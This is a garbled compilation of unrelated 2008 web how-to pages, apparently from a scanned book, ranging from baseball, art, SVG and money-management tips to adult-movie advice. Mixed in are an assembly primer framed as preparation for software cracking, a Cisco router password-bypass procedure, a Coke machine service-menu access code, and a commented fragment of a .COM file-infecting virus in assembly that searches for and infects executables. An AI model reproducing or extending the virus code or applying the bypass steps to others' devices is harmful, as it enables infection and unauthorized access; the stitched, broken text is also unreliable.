Hey, This is a very basic guide to assembly for all those people who couldn’t be bothered learning the in’s & out’s of their computer just to be able to use mIRC without having to click on some guys face. :)

I’ll basically go through the most necessary stuff that you need to know before you can begin to crack. I know it’s not in a very logical order, but what d’ya want for free? ;))

Oh yeah, you should view this with wordwrap on, otherwise it’ll be a pain in the arse to follow ;)


Registers are basically default places in which to store data. The only ones we need to worry about are: (E)AX,(E)BX,(E)CX,(E)DX( The (E) is only significant when debugging 32-bit code )

Also the register pairs:DS:SI ; Can be used as the source for string operationsES:DI ; Used as the target for string operations

To understand registers isn’t very important for cracking, generally just to know that they’re variables for data storage is enough to get you started :)


Flags are essentially like registers except that they can only be true or false ( ie 0 or 1 ) These are set by commands such as CMP, and are used to check the outcome of such a call, ie:

CMP AX, BX ; Compare AX to BX, if equal the zero flag is set to 1JZ 00124531 ; If the zero flag is set, jump to 001254531.

To understand this properly you’ll probably have to read on and then come back... :P

How to Hack a Coke Machine - wikiHow http://www.wikihow.com/Hack-a-Coke-Machine

1 3 22/4/2008 4:36



How to Hack a Coke Machine

Want to dazzle your friends with your technical powers while checking out the profitability of a vending machine route? Readon. Most Cokemachines built since the late 1990s can be hacked with a simple access code. Once you enter the code, you can find out allkinds of information about the machine's sales.

Please note that this article does not teach you how to steal drinks from drink machines. Stealing is, of course, illegal.

StepsFind a machine that has an LED screen. The small screen will typically scroll a message such as "Ice Cold Cokes". If themachine's LED display simply displays the price, the steps below may not work.


Enter the access code by using the drink selection buttons. The default access code is 4, 2, 3, 1, but the buttons aren'tnumbered. They will either say nothing or have pictures of Coke, Diet Coke, Sprite, and other Coca-Cola products onthem.

If the buttons are in a column, button 1 is the top one. Button 2 is the second one from the top, and so on.

If they are in a grid or other format, button 1 is the top left one. Button 2 is the one directly to the right of that, and soon.


Scroll through the menu to find out information about the machine. Once you enter the correct access code, the messageon the LED screen will change. Typically it will say "EROR," but on some machines it may simply display a number. Usethe buttons to navigate through the menu.

Press button 1 at any time to return to the previous menu or to exit the menu to go back to normal mode.

Press button 2 to scroll up through the selections.


Press button 3 to scroll down through the selections.

Press button 4 to select the displayed menu option.


Example Menu OptionsEROR: This menu option displays error messages for the machine, including problems that occurred with the refrigerationsystem, the vending mechanism, the bill changer, and the bill validator. To see error messages, press the select button(button 4) when the display shows EROR, and then scroll through to see specific errors. Select an individual error to seemore details. Generally if only one type of error has occurred you won't be able to scroll through other error options.


CASH: This option allows you to see the machine's total historical cash intake, as well as the resettable cash counted foreach drink selection. Press the select button when the the LED display shows CASH. This will show you the historical cashcounted by the machine. Note that it will include fractions of a dollar, such that if it displays 1452425, the historical cashcount is $14,524.25. Use the scroll buttons (2 or 3) to navigate to the cash counts for each slot (each beverage selection).The number displayed will show first the slot number and then the revenue for that slot number since the last time thecounter was reset. In some machines, it will be preceded by the letters CA or SL (for "slot").


SALE: This option allows you to see the machine's historical total number of sales, as well as the resettable number ofsales for each drink selection. It works like the CASH menu above, except that the numbers displayed reflect the numberof beverages sold.


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TaskAnalysisReadyMorn http://maxweber.hunter.cuny.edu/pub/eres/EDSPC715_MCINTYRE/...

1 1 12/4/2008 11:36

Getting Ready For School In the MorningWalk towards your seat in the classroom.

Place your book bag on the top of your desk.

Take off your coat and place it on the back of the chair.

Sit down at your desk.

Unzipper your book bag.

Take out your books and pencils and place them inside your desk.

Take your book bag and coat to the closet.

Hang both on your hook.

Walk back to your desk.

Sit down quietly and wait for the teacher's instructions.

Return to the page on Task Analysis

How To Improve your yellow pages advertising - OpenTutorial http://www.opentutorial.com/Improve_your_yellow_pages_advertising

1 4 12/4/2008 7:50

Improve your yellow pages advertisingFrom OpenTutorial

How to Improve Your Yellow Pages Advertising

"If you look at a 1951 Yellow Pages directory from Buffalo, New York, the ads appear basically the same then as theydo now, not counting the recent addition of various color options. Forty-five years later, advertisers for the most part are still just highlighting their name and phone number. By simply enlarging the information that appears in their free listing, advertisers are definitely not getting as much out of their ads as they could be."

So contends Dennis Rosen, an associate professor of Business at the University of Kansas who teaches courses in marketing, advertising, and consumer behavior; he is also a 10-year consultant in the Yellow Pages industry.

"When consumers pick up the Yellow Pages to help them make purchase decisions, they often aren't looking for a particular business name," Rosen continues. "Nor will they subsequently walk into an advertiser's place of business and say, `I'm here because I really like your phone number.' So rather than emphasizing a name and phone number, advertisers should be highlighting key selling points - instead of treating such information as incidental. The historicalemphasis in this medium on attracting attention has often been to the exclusion of communicating a marketingmessage."

According to Rosen, most small business owners - who comprise the primary Yellow Pages customer base - don't think that much about their ads until the sales representative calls. "Few other critical business decisions are made with so little time and analysis," he says, "even though for many entrepreneurs, the Yellow Pages are their only or primary means of advertising."

Rosen claims that planning Yellow Pages advertising should be an ongoing process that takes place throughout the year. "Owners should ask themselves, `What is it that I want to say?' rather than simply `What size do I want to be?' Deciding on the appropriate message to put across, and acquiring enough information to make this and the other decisions involved, takes time."

The three critical areas in which entrepreneurs should acquire information, notes Rosen, are your business, your competitors, and your customers.

"The first area should be easy because you know your business and live it on a daily basis. However, you must ask yourself what you want to accomplish," Rosen points out. "Do you want to grow? Are you satisfied with maintaining the status quo? Determining the answers to long-term questions such as these, and being as well-prepared as possible before you meet, will enable your Yellow Pages sales representative to better serve you in the consultative capacity of planning your advertising program."

In terms of competitors, small business owners have a tendency to think that they compete with everyone in their heading, warns Rosen. "In fact, taking attorneys as an example, you can see by looking at the ads that they project different images, and specialize in different areas of the law. So it's important to first eliminate non-competitors in your heading and hone in on those who more directly compete for your current and potential customers."

In addition to determining what distinguishes them from the competition, Rosen advises entrepreneurs to think about

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How To Make Your Kids Good Money Managers | How To Do Thing... http://www.howtodothings.com/business/how-to-make-your-kids-goo...

1 2 13/4/2008 10:17




By Mary Norton

How To Make Your Kids Good Money Managers

Often, we hear parents complain how incapable their kids are of handling money, or we see parents

endlessly shelling out and teaching their kids that money is an endless resource! We see first

semester college kids blowing the month’s allowance on a new shirt and calling home for more.

Understanding finance or even basic money management is not on the curriculum in high school. So…

it is up to you. If you don’t teach them how to manage money, they will learn… but it will be a nasty

experience and make nasty family relationships. Here are some steps to take:

Make yourself financially literate. Your kids see how you handle your own finances and this

strongly influences the way they handle their own finances. Late bills piled in a corner?? No

savings plan? No investment strategy… not even a little bit each month?? Credit cards maxed

out!!!!! Wow… what do you expect from them? Let them see you not in prayer to money, but

managing it sensibly, and you’ve gone the first step.


Know your kids. Listen to them. The time to educate them is when they start asking you to buy

them things or give them allowances or when they start comparing what they have with other

kids in school. Don’t just stick to the old parents’ rant of “Money does not drop from the sky”.

This is your opportunity to make them understand how you do a budget and why you need to

balance what you earn and what you spend. It’s also a great chance to start talking about

planning and prioritizing.


Bring your kids to the bank to participate in the transactions you do. They will get to

know and understand how and why you save money, how to make your money grow, how to deal

with banks, and how your banks can help you with your finances (or snatch money out of your

pocket). When they are older, ask your bank contact to explain to them the basics of banking and



Start them investing early. You can start them investing by getting them stocks of companies

they like and know of. Disney……the company where you work…..a big company in town --

anything that you can talk about. These stocks can take the place of toys they enjoy for an hour

at most and then store under the bed. There are companies that offer DRIP, Dividend

Reinvestment Plan. Buy them stocks in this and let them watch in the newspaper the growth of

these stocks.


Start teaching them how to handle money. You may start them buying your groceries. They

will start making choices when you give them a budget for the weekly groceries with a list of the

“must haves” and then they can pick their snacks. You can also give them their allowance. Start

them on a daily allowance and once they get used to handling their own money, move them to a

weekly and then a monthly allowance to get practice in budgeting. Oh… and make it fun. Learning

is supposed to be fun and you can make these sessions real fun at the dinner table or the store.


Encourage your kids (or grandkids) to save money. They can start cutting coupons for

groceries and then saving some of their allowance. Tell them to check the products you buy, and

if they can find coupons, you will buy the coupons from them as an allowance enhancement. This

will get them scouring the newspapers as a bonus!!!


Encourage them to start earning money. You can brainstorm with them possible ways of

earning money that make sense for their age levels. This is good when they really want to get

something that costs more than their allowance. Rather than just giving them the money, they

can find ways of earning the money.


Encourage them to make decisions on money and its use. Show them the budget for8.


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Page 202: The Instructional Capital volume I

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3DS Max Cloth Bed Tutorial http://www.countermap2.com/poopsmith/tutorial_bed/bed2.html

1 3 11/4/2008 7:30

How to Make Your Bed!

By: Craig Mouser

Ok, to start off i have modeled a basic bed. It involves somebasic polygon modeling, and a few chamferboxes. If you dont know how to do this part, I would suggest doing some earlier tutorials first. Please ignore all the random cuts on top of the matress. Those are unneeded.

Next thing i did is model too basic pillow shapes, which will be used for the cloth to react to. You can see the basic model, and then with a meshsmooth modifier applied after.

Alright, Now we will create a box (cylinder also works well), slightly larger than the pillow. The tighter the fit the better. Convert it to an editable poly, inset one side, and extrude it with a negative value like on the picture on the right. If you want use the connect tool to make some extrudes for the little lacing like i did. Be sure to make these slightly larger than you want because the cloth/meshsmooth makes them smaller.

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The Correct Way to Make Art http://www.ndoylefineart.com/correctart.html

1 1 18/4/2008 5:20

The Correct Way to Make Art

I sometimes receive e-mails from people who seem to think there is a way to paint a good paint ing - a correct way - which when followed produces an indisputably good painting. They seek a magic formula - Step 1, Step 2..., a closely guarded secret that they can use to become a good paint er - quickly. When I hear this, I wonder: Is there a correct way to love someone? To make an ice cr eam sundae? To sing, to write music? It seems to me that the heart and soul of art, and some other things, is how each person creates their own unique likeness.

Rather than being a weakness of art, this infinity of possibilities is really its strength. In so many areas of life, especially nowadays, there really is only one right answer and one right way. W e have become so regimented in society that every form we fill out, every can we open, every highway we drive on, must be done exactly. There are directions and instructions for almost everything - how to open a car window, how to use a MAC machine, how to figure our taxes. The left side of our bra ins is probably swollen from overuse, and conversely the right side - the daydreaming, creative pa rt - is vastly underused. Of course we would think there is a right way to make art; just like in trigonometry, there must be some calculable answer! But as Matisse said, "Exactitude is not tr uth."

We are so busy following the letter, we are forgetting about the spirit. And the arts are all about spirit. They may be the only place where there is no one answer - only limitless possibility. Perhaps this bungie jump is scary for beginners - but try it for awhile, you will catch on qui ckly tothe joy of this freedom. One of the main purposes of art is discovery - of self, of visual ide as, of expressive possibilities. There may be some art teachers who feel that there is only one way; they are wrong! Other art teachers may, in an effort to encourage us to follow our own inclinations , take a backseat by being non-directive. Instead of being the result of laziness or indifferenc e, this may be their way of leading us to ourselves, to trust ourselves.

There are differing viewpoints among artists - called aesthetic viewpoints. The Minimalists ma y look down on the realists; the realists may look down on the abstractionists, etc. In the 20th century, the art "isms" encouraged this behavior: the Futurists thought their manifesto was th e proper future for art; the Surrealists felt they had found the ultimate reality. When these differences cause artists to believe that only their doctrine is the right one, we reach the s ame dilemma as beginners who seek the Answer. How weird would it be if every artist produced Minimalist art, or all musicians played country music? To me, it seems suspicious if even two artists do the same kind of work; not just in the sense of one copying the other, but because one ofthem is not being true to him/herself.

Another art fallacy is the Masterpiece. In the Renaissance, when this concept came to be, an a rtist was considered a craftsman/tradesman. He or she studied as an apprentice in the studio of an established artist, until they gathered sufficient competence to become a Master. At this poin t, theywould produce their Master Piece, to show their progress. Since the Renaissance, the artist ha s grown into more of a professional situation; they are often taught in schools and graduate to become individual artists who are more or less free to produce what they want. Their reputatio ns are not based on one work, but on a whole lifetime of serious work and study - for exampleCezanne.

The common use of the word 'masterpiece' refers to a work that reflects formal and expressive "perfection." Some works, like the Mona Lisa by da Vinci, are called masterpieces. In the modern marketplace, this gives artworks great monetary value, but otherwise is not very meaningful. O il paintings have been prized partly because of their longevity. Starting in the early 20th centu ry, the idea of this permanence leading to value was questioned by artists; in fact the whole idea of permanence came into question. We realized that nothing is permanent - all is fleeting; artist s began to incorporate this idea into their work. By the middle of the century, artists began deliberately producing works which would not last, such as Andy Goldsworthy and Robert Rauschenberg. This is similar to the idea that a rose is more beautiful because it dies; that all matter passes, and now being biodegradable is a good thing. We tend to live in the moment now.

Even with the philosophical notion that nothing lasts, many artists (and collectors) value permanence in a work of art. Part of the expectation, after purchasing a work, is that it will last many years, even centuries. Oil paintings perhaps were considered the most valuable of mediums for this reason, until acrylics appeared in the 1950's. Acrylics are now considered permanent, beingplastic (is this good for the environment?) So in this sense - the use of materials - there is a "correct" way to stretch canvases and prime them. Because of interacting chemicals in the materials, it is good to follow traditional practices when stretching and priming canvases, if we want our work to survive. Many people have asked me about using unorthodox materials in artworks - such as using hairspray as a fixative for pastel. They don't seem to be concerned a bout using permanent materials (correct ones), yet they want to find the correct way to paint their images. And using permanent materials appropriately together is the only place where they shou ld be concerned about correctness (assuming they don't want their paint layer to dissolve in 10 o r 20 years).

Another situation where correctness may be a valid issue is in realist painting. We may want t o use the rules of correct perspective and anatomy in our realistic works. People ask what are the r ules of composition. These visual cues are constantly changing, and all the great artists I can think of are the ones who broke the "rules." They didn't always set out to do this - sometimes just in the process of being and becoming themselves they painted and sculpted in a new way. Looking for design recipes doesn't provide us with the authentic art-making experience, which is personal and experiential. When we use recipes, we are robbing ourselves of the most important part of the artistic process - like falling in love without spending any time together. When students are beginning they go through a process with themselves or with teachers where they learn by tria l and

Nancy Doyle Fine Art



Small Paintings




Computer Art

Art Instruction

Contour Drawing

Mass Drawing

Gesture Drawing

Charcoal Drawing

Figure Drawing.

Perspective for Artists

Stretch Canvas

Painting Materials

Still Life

Painting: Possibilities

Color Mixing

Design: Meaning

Design: History

Design: Guidelines

Design: Elements

Design: Principles


Mechanics of Drawing

How to Give Better Instructions http://ezinearticles.com/?How-to-Give-Better-Instructions&id=305933

1 5 18/4/2008 2:51

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How to Give Better InstructionsBy Wally Bock

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If you're the boss, you have to give directions. It's part ofthe job.

Do the job well and you only have to do it once. Do the job poorly and you have to do it again. You might evenhave to fix things that have been done wrong. Here are three rules and twelve tips for giving good instructions.

First, here's a quick list of the three rules.

Rule 1: Give instructions in the ways that work best for your subordinateRule 2: Give your directionsin more than one wayRule 3: Check forunderstanding

Now let's review the rules in detail.

Rule 1: Give instructions in the ways that work best for your subordinate. Different people process information in different ways. To be mosteffective, you need to master different ways of presenting instructions so you can choose and use the best way for each subordinate.

Psychologists tell us that there are three basic information processing modes. Visual processorsthink in pictures, while auditory ones think in sound and dialogue. Kinesthetic processors needmotion and gesture to understand. Frame your instructions in language

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Page 204: The Instructional Capital volume I

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TaskAnalysisTieShoes http://maxweber.hunter.cuny.edu/pub/eres/EDSPC715_MCINTYRE/...

1 1 12/4/2008 11:27

Tying shoes (shorter version for kids who need help with the first few steps) Grab one lace in each hand. Pull the shoe laces tight with a vertical pull. Cross the shoe laces. Pull the front lace around the back of the other. Put that lace through the hole. Tighten the laces with a horizontal pull. Make a bow. Tighten the bow.

Tying shoes (longer version) Pinch the laces. Pull the laces. Hang the ends of the laces from the corresponding sides of the shoe. Pick up the laces in the corresponding hands. Lift the laces above the shoe. Cross the right lace over the left one to form a tepee. Bring the left lace toward the student. Pull the left lace through the tepee. Pull the laces away from one another. Bend the left lace to form a loop. Pinch the loop with the left hand. Bring the right lace over the fingers and around the looop. Push the right lace through the hole. Pull the loops away from one another.

Return to the page on Task Analysis

Page 205: The Instructional Capital volume I

204 205

Technique #1

All Cisco 2000 Series, 2500 Series, 3000 Series, 680x0-Based 4000 Series,7000 Series Running 10.0 or Later in ROMs, IGS Series Running 9.1 or Laterin ROMs

This technique can be used on the 7000 and 7010 only if the router has 10.0ROMs installed on the RP card. It may be booting Flash 10.0 software, butit needs the actual ROMs on the processor card as well.

1. Attach a terminal or PC with terminal emulation to the console port of the router.

2. Type “show version” and record the setting of the configuration register. It is usually 0x2102 or 0x102.

3. Power the router down, then up.

4. Press the Break key on the terminal within 60 seconds of the power up. You will see the > prompt with no router name. If you don’t, the terminal is not sending the correct Break signal. In that case, check the terminal or terminal emulation setup.

5. Type “o/r0x42” at the > prompt to boot from Flash or “o/r 0x41” to boot from the boot ROMs. Note that this is the letter “o,” not the numeral zero. If you have Flash and it is intact, 0x42 is the best setting. Use 0x41 only if the Flash is erased or not installed.

NOTE: If you use 0x41, you can only view or erase the configuration. You cannot change the password.

6. Type “i” at the > prompt. The router will reboot but will ignore its saved configuration.

7. Answer “no” to all the setup questions.

8. Type “enable” at the “Router>” prompt. You’ll be in enable mode and see the “Router#” prompt.

9. Choose one of these three options:

o To VIEW the password type “show config.” o To CHANGE the password (in case it is encrypted, for example): a. Type “config mem” to copy the NVRAM into memory. b. Type “config term” and make the changes to the configuration.

conf t enable password password ctrl-z

c. Type “write mem” to commit the changes. o To ERASE the config, type “write erase.

10. Type “config term” at the prompt.

11. Type “config-register 0x2102,” or whatever value you recorded in step 2.

12. Hit Ctrl-Z to quit from editor.

13. Type “reload” at the prompt. You do not need to write memory.

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Unreal Engine 3 Game Engine Unreal Learning #3: Delving Deeper in... http://www.moddb.com/engines/4/unreal-engine-3/tutorials/24722/unr...

1 5 14/4/2008 4:56

Page 1 of 4

Unreal Engine 3 Game Engine Unreal

Learning #3: Delving Deeper into

UnrealScript tutorial

Unreal Engine 3

Epic Games | Released Sep 1, 2007










Unreal Engine 3 is a complete game development framework for next-generation consoles and

DirectX9-equipped PCs, providing the vast array of core technologies, content creation tools, and support

infrastructure required by top game developers.

Unreal Learning #3: Delving Deeper into UnrealScript

After having written our first mutator, and created a mutator with a user configuration menu, we'll now

take a closer look at the UnrealScript language.

Posted by ambershee on Dec 3rd, 2007 digg this super bookmark

Basic Server Side Coding.

We've written a mutator, we've made a configuration screen in UnrealEd and tied it up in code. This is all

fantastic, we're on our way to fast becoming Unreal programming gurus! But there's one thing we'll quite

definitely need to know - we need to get to grips with the unrealscript itself, otherwise we'll never get


Whilst todays tutorial won't actually get us building anything, it is perhaps the most useful and

important, because today we'll be focusing on exactly what unrealscript is, and how we can best deploy it.

What is Unrealscript?

Unrealscript is the soft architecture behind all of the core game mechanics in Unreal Tournament 3, and

many, many other games. In Unreal Tournament 3, it not only controls things such as how the power ups

and weapons are handled, it also deals with the gameplay fundamentals, and even the vast majority of the

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two straight lines: Specimens http://twostraightlines.typepad.com/two_straight_lines/2008/03/speci...

1 5 13/4/2008 4:03

two straight lines


Elliot and I decided to make some terrariums, so last week we headed out to our local plant store and picked out some

nice specimens. It took us a whole week to gather the supplies (giant jars and dinos from Target, everything else

besides plants from Downtown Home & Garden), and we put them together this morning. I really struggle with

houseplants because I am fickle with a short attention span, but I have great hope for these because I read online that

most terrariums fail due to over watering. Well, they clearly haven't met me. (Husband chuckles)

The dinos were originally intended for a paludarium in Elliot's room, but he wanted them in the kitchen, and actually I

quite like them. Elliot and my husband (do I ever say his name? his name is Scott) ran to Target for one more dino

and a smaller jar for his room. I would show you a photo of that one, but its rest time, and of course, one does not

interrupt rest time.

Science is so cool, why did my teachers have to make it so dang boring?

This one is my favorite. I love the way that guy looks like he's eating the plant. Scott says this one doesn't eat plants. I

say only boys care about such details.

I keep forgetting to tell you, a local friend of mine started a blog, and she is super sweet as well as the queen of

Choosing Adult Movies – How to Pick Adult Movies that Are Right f... http://sexuality.about.com/od/eroticmovies/ht/choosing_movies.htm

1 2 19/4/2008 3:01


How To Choose Adult MoviesFrom Cory Silverberg,Your Guide to Sexuality.FREE Newsletter. Sign Up Now!About.com Health's Disease and Condition content is reviewed by the Medical Review Board

Navigating your way through the tens of thousands of adult movie titles available can be treacherous and disheartening. But there is a surprising amount of variety hidden below the mass of cheaply produced adult movies that come out each year. Here are some tips for picking an adult movie that you'll actually enjoy.

Difficulty: N/A

Time Required: Finding adult movies you like can take several attempts

Here's How:

Benefit from the adult movie wisdom of others.You ask friends to recommend books, restaurants, and TV shows, why not adult movies? Of course you won’thave this kind of relationship with everyone, but if there are people you’re comfortable asking for suggestions,then ask! You can also make use of online movie reviews and the few good books about adult movies. While allsex stores are guilty of some over blown marketing, the better sex shops tend to be a bit more honest than otherretailers about the pros and cons of their selections.


Consider the big media picture.While it may seem like all adult movies are the same, there is surprising variety in adult videos. One way to narrow down the field is to consider what you like in other kinds of media. For example,

Do you prefer movies with big budgets, elaborate plots and set designs?Do you like the gritty feel of a hand held camera?Do you prefer documentaries over feature films?Is character development important or do you just want to see stuff happen?

All these issues can impact which adult movies you’d like.


Selection criteria #1: Raunchy or romantic?In truth you can have both, but one of the first things to consider is your comfort level with explicitness. Do youwant a movie that has lots of sweating, anal sex, and dirty talk? Are you looking for something with morecandlelight and slow sensuality? It takes a few tries to find a balance between enough action to turn on and toomuch that’s a turn off -- but you have somewhere to start. Even though there’s more rough sexual contentavailable, there are still directors making movies for people who don’t need to see it all to get turned on.


Criteria #2: What do you want to see?Another basic consideration is what kinds of sex you want to watch. The vast majority of adult movies involvepenetration (vaginal, anal, or both), oral sex, and a small amount of what might be considered foreplay. Othermovies focus on BDSM or power play, or only feature one sexual act (for example only masturbation or oral sexor only threesomes). If you’re just starting to watch adult movies you may want to start with something thatoffers variety. But if you know what you want these days you’ll likely find it all in one movie.


Criteria #3: Whose doing what, to who?Next, who you want to watch having sex. Adult movies are very compartmentalized; with few exceptions a "gay"movie will only show sex between two men, a "lesbian" movie will only show sex between two women, a"straight" movie will show sex between a man and woman and between two women, and a "bisexual" movie willhave men and women having sex with each other. You don’t have to only watch the kind of sex you have. Forexample, plenty of straight women like watching gay porn. This is a safe way of exploring your desire andgetting creative -- don’t limit yourself.


Criteria #4: Big budget or indie?There is a huge variation in the productions values to be found in adult movies. From large casts, good lighting,costumes, continuity and character development to a guy in a basement with a DV camera, there’s somethingfor all tastes and the choice is yours. Think about whether or not low (or no) production values will get in theway of your enjoyment. On the other hand, maybe you can’t stand the bad acting and the attempt at set designand you just want to see something that "looks real."


Finding your adult niche.7.

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;****************************************************************; START OF THE EXAMPLE:;****************************************************************;Warning, this example is a (piece of shit?); - The virus does not test for prior infection; - it searches only for the first .COM file in the current; directory;; Careful when executing this file, since the first time it’s; executed it will search for and infect the first file in the; directory. If we later run the newly infected file, it will find

; the first file in its directory, itself. Thus, it will re-infect

; itself over and over.;===================CODIGO=======================================;(The variables in a .COM file are relative to offset 100h).

codigo segment ‘code’ org 100h ;Organize all the code starting ; from offset 100h assume cs:codigo,ds:codigo,es:codigo ;Define the use of the ;segments

start proc far ;Start the routineCOMIENZO: push cs ;Store CS push cs ;Store CS ; once again. pop ds ;Bring DS out from stack pop es ;Bring ES out from stack

call falso_proc ;Call proc. so that its ; address is placed in the stackfalso_proc proc nearfalso_proc endp

pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP - Previous directory

;This is done to take the variables relative to BP, since the;infection displaces the variables at exactly the length of the; file. At the first infection, instruction “SUB BP, 107h” is; 107h, so that the contents of BP is 0; when I call a variable; with “BP+VARIABLE” the value of the variable’s address is not; modified. When I load it , for example, from a 100h byte; infected file, the instruction “SUB BP, 107h” leaves me at; address 207h which means BP=100h, the size of the original file.; Had I called the variable without adding BP, I would have been; short by 100h bytes.

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How To Hit a Baseball | How To Do Things.com http://www.howtodothings.com/sports-recreation/how-to-hit-a-baseball

1 2 13/4/2008 10:20




By James Goetz

Difficulty: Cost:

How To Hit a BaseballScience and Art of Hitting a Ball

Hitting a baseball is the single most difficult task to do in all sports. You can fail 7 out of 10 times and

still be considered one of the greatest to ever hit a ball.

There are some basic steps though that all hitters must follow in order to be successful at this.

Have fun. Without having fun, baseball is not worth it. It is a game played by children and just

so happens that grown men still get to play. Do not take it too seriously and remember to smile.


The next steps must be practiced daily. You are training your nerves and muscles to work

synergistically and be able to react to pitches.


Find a bat that is comfortable. It should be a good length and a weight that is comfortable

enough to swing. A good test is to hold the knob of the bat and lift the bat until it is parallel to

the ground in front of you; if you can hold it here, the bat should be a good weight. The length

should be long enough that you feel you may cover the entire plate. The length and weight

difference should be no more than -3 for proper balance of the bat. (Ex: If the bat is 33 inches, it

should be no less than 30 ounces.)


Step into the batter's box. Ensure you can cover the entire plate, yet are far enough off the

plate that the pitcher will not be able to jam you.


Bend your knees slightly and be comfortable. The bat should be near your rear shoulder and

you should be loose and comfortable.


Look at the brim of the pitcher's cap until you can see the ball. This will ensure you see

the ball as long as possible. This is crucial as you only have a tenth of a second to see the ball,

know what pitch is going to be thrown, where it will end up, and decide to swing or not and to

swing and make contact with the ball. Every moment counts.


As the ball appears, look intently on it and concentrate. Don't take your eye off the ball!7.

Your body should sway ever so slightly backwards and torque itself.8.

Your hands should be moving forward towards the ball and your hips should be

rotating at the same time.


Connect the barrel of the bat with the ball in a chopping motion as if you were

chopping a tree down with an axe.


Follow through with the swing.11.

As the ball is hit, run to first base and watch your first base coach for instruction.12.

These are simple steps that all hitters follow. Practice, be relaxed, have good form, and have fun!


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How to do photoshop-like effects in SVG - Opera Developer Community http://dev.opera.com/articles/view/how-to-do-photoshop-like-effects-i...

1 7 18/4/2008 11:13

How to do photoshop-like effects in SVGBY ERIK DAHLSTRÖM · 29 FEB, 2008


Introduction(http://my.opera.com/MacDev_ed/blog/2008/02/01/how-to-do-photoshop-like-effects-in-svg)Icame across this nice Photoshop tutorial(http://psdtuts.com/interface-tutorials/how-to-create-a-stunning-vista-inspired-menu/) the other day. Looking at this, and the other tutorials available there made me want to try to recreate the same effects, not using Photoshop however, just SVG. Read on for my take on the above tutorial. To better follow the steps in my article I recommend reading these side by side.

Note that the original version of this article can be found on my blog(http://my.opera.com/MacDev_ed/blog/2008/02/05/how-to-do-photoshop-like-effects-in-svg).

Step 1Create a new SVG file, and create an svg canvas like so:

<svg xmlns="http://www.w3.org/2000/svg"


viewBox="0 0 600 335">


By adding a viewBox with the dimensions 600 x 335 you can get the SVG to scale to whatever size you want later on.

Step 2Next, create some rectangles and a couple of gradients by adding the following inside the svg element.

<linearGradient id="lowergrad" x1="0" y1="1" x2="0" y2="0">

<stop stop-color="#000000" offset="0"/>

<stop stop-color="#0c0c0c" offset="1"/>


<linearGradient id="uppergrad" x1="0" y1="1" x2="0" y2="0">

<stop stop-color="#35393d" offset="0"/>

<stop stop-color="#787b7d" offset="1"/>


<g id="bar" fill-opacity="0.9" shape-rendering="optimizeSpeed">

<rect id="upperbar" y="285" width="600" height="25"


<rect id="lowerbar" y="310" width="600" height="25"



The linear gradients gradiate between the first color and the second color at a 90 degree angle. 90 degree angles (sometimes called straight angles) are easily translated into a vector from point (x1,y1) to point (x2,y2), where the

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How-to-do-it Philosophy Study Guide http://www.philosophypathways.com/guide/

1 2 18/4/2008 11:13

Philosophy: How-To-Do-It Guide as regards the sounding-out of idols, this time they arenot idols of the age but eternal idols which are heretouched with the hammer as with a tuning fork...

Friedrich Nietzsche Twilight of the Idols 1888

If you want to philosophize well, you need a good tool kit. Notjust a hammer, but screwdriver and pliers, drill and saw. Everystudent who starts out on the road to philosophy learns how tovalue and assess the tools available. Try everything. Pick upanything you can use, from as wide a variety of sources aspossible.

Over the years that I have been running Pathways toPhilosophy, certain basic issues concerning the nitty-grittypractice of philosophy have come up again and again: 'I don'tknow how to approach a philosophy book,' writes one student.'Every time I put pen to paper I find myself writing completerubbish.' 'I just don't know to think!'

If philosophy as a subject intrigues you, but you doubt whetheryou've got what it takes to study philosophy, I hope that whatyou find here will help get over the initial barriers. So grab yourtools and get stuck in! [more...]

Geoffrey Klempner

Director of Studies

Pathways Study Guide | Why Study Philosophy? | Lessons inPhilosophy | Six of the Best | Can Philosophy Be Taught? |Questioning Philosophy

Pathways Study Guide

These pages, inspired by questions to Ask a Philosopher, developed out of pieces written for The GlassHouse Philosopher.

Why Study Philosophy?

"How to Write a Philosophy Essay" and other pieces selected from the introductions to Pathways toPhilosophy and Associate and Fellowship awards.

Lessons in Philosophy

Pages taken from The Glass House Philosopher, taking a look at some of the things that introduction tophilosophy books don't teach you, including "Creating a space", "How much intelligence does a philosopherneed?" and "Knowing when to stop."

Six of the Best

What is a philosophical attitude? Pathways students Laura Laine Kelley, Martin O'Hagan, Glyn Hughes,Jackie O'Connor, Alberto Capizzano, and Graham Nicholson explain.

Can Philosophy Be Taught?

How to Use Bad Language Without Getting in Trouble - wikiHow http://www.wikihow.com/Use-Bad-Language-Without-Getting-in-Trouble

1 2 19/4/2008 2:50





How to Use Bad Language Without Getting in TroubleEver wanted to swear, but your parents won't let you? Here is how touse bad language without getting in trouble.

StepsNEVER say it when your parents are less than 2 rooms away from you. Your parents could easily overhear it and you'd bein trouble.


Don't use it around tattletales. If a friend that always tells on you comes over to your house, don't cuss in front of them.2.

Do not swear in church. It is just not right.3.

If you, for some reason, have cameras around the house, make sure you know the location of every single one. Thereforeyour folks won't be able to eavesdrop through the cameras.


It may be a good idea to only swear outdoors. Parents don't usually actually monitor their children by being outside withthem, so for the most part they shouldn't hear you unless they have REALLY good hearing.


Ask what words you are allowed to say. Sometimes parents allow their children to say certain words on top of others.6.

TipsIn school you just shouldn't cuss unless you are in high school or higher. There will always be someone who will tell.

I repeat, it just isn't RIGHT to use bad language in church, and in some churches you can get in serious trouble if you'recaught.

You COULD try cursing in different languages....but people might call you wierd for saying "Katten" or "Skitit"

WarningsBe careful with the "n-" word. There are huge arguments going on about that.

It isn't a good idea to swear behind your parents backs. If you just got into trouble and you do so, you could get into moretrouble for talking back.

First and foremost - bad language is always bad taste. No matter if anyone can hear you or not. Focus your efforts onself-control and learning to express yourself without using bad words. You will be a better person for it. Finally, whetheryou realize it or not, someone else is ALWAYS listening.

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Research the Montgomery G.I. Bill, which provides for a spe-cific amount per month to be taken from the member’s salary for 12 months. For a full-time college student, the MGIB will pay monthly for a total of 36 months of school.Apply for another military college fund known as the Army College Fund. You must first be enrolled in the MGIB program before you’re eligible to receive ACF benefits. Your recruiter can give you the appropriate application forms when you enlist.Request information from your recruiter about participation op-tions in the ACF program. This program is only available to new recruits during the enlistment process. Officers are not eligible to apply for ACF assistance. In addition, the ACF is restricted by the Army to only areas that are in short supply.Meet the requirements to apply for the ACF military college fund. You must have a high school diploma upon making application to enter active duty. Also, you must have a score of at least 50 on the AFQT (Armed Forces Qualifications Test).Apply directly through the Veterans Administration to receive benefits from the ADMGIB (Active Duty Montgomery G.I. Bill). The decision to participate in the ADMGIB must be made during basic training. It is for active duty military members. Educational benefits are granted in return for a minimum of 3 years of com-mitment to serve.Ask the Army Recruiter about the 